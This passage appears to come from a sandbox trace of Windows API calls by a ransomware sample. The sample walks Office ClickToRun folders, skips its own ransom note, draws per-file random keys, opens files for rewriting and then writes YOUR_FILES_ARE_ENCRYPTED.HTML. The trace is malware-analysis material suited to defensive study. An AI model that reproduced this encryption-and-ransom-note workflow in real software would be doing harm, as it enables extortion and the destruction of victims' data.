returned 1 [0156.603] GetProcessHeap () returned 0x270000 [0156.603] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.604] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AD") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9E") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="20") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="BC") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FF") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F4") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="4C") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BC") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D8") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="CC") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AD") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="0D") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="75") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="41") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="7A") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="B3") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="30") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9A") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9A") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B0") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="4C") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="FD") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="0A") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="00") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="41") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AB") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="76") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="60") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="A2") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D3") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C5") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="69") returned 2 [0156.606] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" [0156.606] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.606] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.610] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7815fb90, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1301e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.wordmui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~1.XML")) returned 1 [0156.610] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml") returned 115 [0156.610] lstrcmpW (lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.610] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml") returned=".xml" [0156.610] lstrlenW (lpString=".xml") returned 4 [0156.610] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml") returned=".xml" [0156.610] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.618] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=77854) returned 1 [0156.618] GetProcessHeap () returned 0x270000 [0156.619] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.619] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="49") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A6") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="BE") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D2") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="E3") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D3") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="63") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BE") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B7") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="EC") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="43") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="EB") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="AF") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F0") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C2") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="ED") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="46") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="F4") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="21") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="07") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DB") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E5") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="91") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B0") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="40") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="05") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="8F") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1A") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D4") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="F4") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="01") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="41") returned 2 [0156.621] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" [0156.621] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.621] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.633] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77a3b990, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0156.633] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 93 [0156.633] lstrcmpW (lpString1="integrator.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.633] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0156.633] lstrlenW (lpString=".exe") returned 4 [0156.633] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0156.633] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91a13d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91a13d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x91a13d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", cAlternateFileName="MICROS~2.XML")) returned 1 [0156.633] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned 132 [0156.633] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.633] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned=".xml" [0156.633] lstrlenW (lpString=".xml") returned 4 [0156.633] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned=".xml" [0156.633] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.633] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.634] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=3304) returned 1 [0156.634] GetProcessHeap () returned 0x270000 [0156.634] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.635] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="93") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D7") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B9") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D0") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="33") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="5D") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F6") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="33") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="95") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A1") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4C") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="45") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="5D") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="37") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="B4") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3F") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="DA") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="29") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CD") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="30") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E7") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="1B") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="47") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="41") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="25") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="01") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="12") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="7D") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="81") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="58") returned 2 [0156.636] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="53") returned 2 [0156.636] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" [0156.636] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.636] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.637] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91126ab0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91126ab0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x91126ab0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xca6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", cAlternateFileName="MICROS~1.XML")) returned 1 [0156.637] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned 129 [0156.637] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned=".xml" [0156.637] lstrlenW (lpString=".xml") returned 4 [0156.637] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned=".xml" [0156.637] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.637] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentlogon2016.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.638] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=3238) returned 1 [0156.638] GetProcessHeap () returned 0x270000 [0156.638] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0156.651] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="09") returned 2 [0156.651] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="67") returned 2 [0156.651] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="09") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="08") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="34") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="C1") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="D3") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="46") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="BA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="E9") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="70") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EE") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F3") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F6") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F1") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EC") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="53") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="5F") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="EE") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B2") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="17") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="FA") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="77") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F7") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="7D") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="62") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="52") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="E2") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="D6") returned 2 [0156.652] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0E") returned 2 [0156.653] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentLogOn2016.xml" [0156.653] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.653] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0156.655] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95bd5cf0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x95bd5cf0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa8ea310, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1b826, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="msoutilstat.etw.man", cAlternateFileName="MSOUTI~1.MAN")) returned 1 [0156.655] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\msoutilstat.etw.man") returned 98 [0156.655] lstrcmpW (lpString1="msoutilstat.etw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.655] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0156.655] lstrlenW (lpString=".man") returned 4 [0156.655] PathFindExtensionW (pszPath="msoutilstat.etw.man") returned=".man" [0156.663] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x949fb7f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x949fb7f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac1041d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="wordEtw.man", cAlternateFileName="")) returned 1 [0156.663] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\wordEtw.man") returned 90 [0156.663] lstrcmpW (lpString1="wordEtw.man", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.663] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0156.663] lstrlenW (lpString=".man") returned 4 [0156.663] PathFindExtensionW (pszPath="wordEtw.man") returned=".man" [0156.663] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x949fb7f0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x949fb7f0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xac1041d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x9bddd, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="wordEtw.man", cAlternateFileName="")) returned 0 [0156.663] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.664] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0156.664] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.664] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, 